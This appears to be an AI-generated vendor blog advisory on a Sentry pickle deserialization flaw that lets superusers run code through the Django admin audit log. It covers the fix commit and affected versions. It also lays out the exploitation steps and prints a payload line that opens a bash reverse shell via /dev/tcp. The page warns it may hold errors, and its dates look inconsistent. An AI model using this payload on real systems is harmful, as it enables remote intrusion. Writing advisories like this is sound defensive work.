ZeroPath at Black Hat USA 2026

Brief Summary: Sentry CVE-2021-47935 Remote Code Execution via Pickle Deserialization in Audit Log

A short review of CVE-2021-47935, a high severity pickle deserialization vulnerability in Sentry that allows authenticated superusers to achieve remote code execution through crafted audit log entries.

CVE Analysis

6 min read

ZeroPath CVE Analysis
ZeroPath CVE Analysis

2026-05-10

Brief Summary: Sentry CVE-2021-47935 Remote Code Execution via Pickle Deserialization in Audit Log
Experimental AI-Generated Content

This CVE analysis is an experimental publication that is completely AI-generated. The content may contain errors or inaccuracies and is subject to change as more information becomes available. We are continuously refining our process.

If you have feedback, questions, or notice any errors, please reach out to us.

[email protected]

Introduction

Unsafe deserialization in Python's pickle module remains one of the most reliable paths to remote code execution, and Sentry versions through 8.2.0 contained exactly this pattern in a field accessible through the Django admin interface. An authenticated superuser could craft a malicious audit log entry that, when processed by Sentry's GzippedDictField, would execute arbitrary commands with application privileges.

Sentry is an application performance monitoring and error tracking platform developed by Functional Software Inc. The platform serves over 4 million developers and 150,000 organizations, with customers including Disney+, Cloudflare, GitHub, Anthropic, and Atlassian. Given this footprint, vulnerabilities in Sentry have meaningful implications across the enterprise software ecosystem.

Technical Information

The root cause of CVE-2021-47935 lies in the GzippedDictField implementation found in db/models/fields/gzippeddict.py. This field processes incoming data by calling pickle.loads(decompress(value)) without any input validation or sanitization. Python's pickle module is inherently unsafe when used on untrusted data because deserialization can trigger arbitrary object instantiation and code execution.

The GzippedDictField is not isolated to a single model. It is utilized by several core Sentry object models, including TagValue, Group, Activity, and AuditLogEntry. The AuditLogEntry model is the most directly exploitable because it is exposed through the Django administration interface.

Exploitation Flow

The exploitation path proceeds as follows:

  1. An attacker with superuser credentials authenticates to the Sentry instance.
  2. The attacker navigates to the Django administration endpoint at http://sentry_host/admin/sentry/auditlogentry/.
  3. The attacker creates or edits an audit log entry, submitting a crafted POST request that includes a malicious payload in the data field.
  4. This payload is a base64 encoded, gzip compressed, pickle serialized Python object designed to execute arbitrary commands.

The payload construction follows this pattern:

rev_shell = '/bin/bash -c "bash -i >& /dev/tcp/%s/%s 0>&1"' %(lhost,lport) payload = b64encode(compress(dumps(PickleExploit(rev_shell))))

When Sentry processes this audit log entry, the GzippedDictField automatically decompresses and deserializes the payload, triggering the embedded command execution. The commands run with the same privileges as the Sentry application process.

A complete exploit script is publicly available as Exploit DB entry 50318, published on September 22, 2021. The script automates the full attack chain: it retrieves CSRF tokens, authenticates as an administrator, and posts the malicious data to the audit log endpoint. Its public availability means defenders should treat this as a known, weaponized vulnerability.

The Fix

The fix, implemented in commit de5e334, marks AuditLogEntry fields as read only in the Django admin interface, specifically including the data field. The commit message explicitly states this resolves a superuser security concern regarding the injection of pickled data.

Affected Systems and Versions

The vulnerability spans multiple versions of the Sentry platform. Based on the available research:

StatusSentry VersionNotes
Vulnerable7.6.0Confirmed affected by Synacktiv
Vulnerable7.7.0Confirmed affected by Synacktiv
Vulnerable8.0.0Tested successfully by Exploit DB author
Vulnerable8.0.2Confirmed affected by Synacktiv
Vulnerable8.2.0Listed in the primary CVE description
Fixed8.1.4Official patch release
Fixed8.2.2Official patch release

The source materials do not provide a comprehensive list of all vulnerable versions between 7.6.0 and 8.2.0. Administrators should assume all versions prior to 8.1.4 (in the 8.1.x branch) and 8.2.2 (in the 8.2.x branch) are vulnerable.

Vendor Security History

Sentry maintains a formal security and compliance program that includes vulnerability management, incident response, and access management. The vendor encourages vulnerability disclosure via a dedicated security email and states they rapidly verify each vulnerability before taking steps to fix it.

In the case of this specific deserialization flaw, Synacktiv reported the issue on April 3, 2015, and Sentry pushed security fixes on the exact same day. This same day turnaround demonstrates a responsive patching posture for critical security issues.

References

Detect & fix
what others miss

Works with
  • GitHub
  • GitLab
  • Bitbucket
  • Azure DevOps Services
  • Jira
  • Linear
  • Slack
  • Security Compass
Security magnifying glass visualization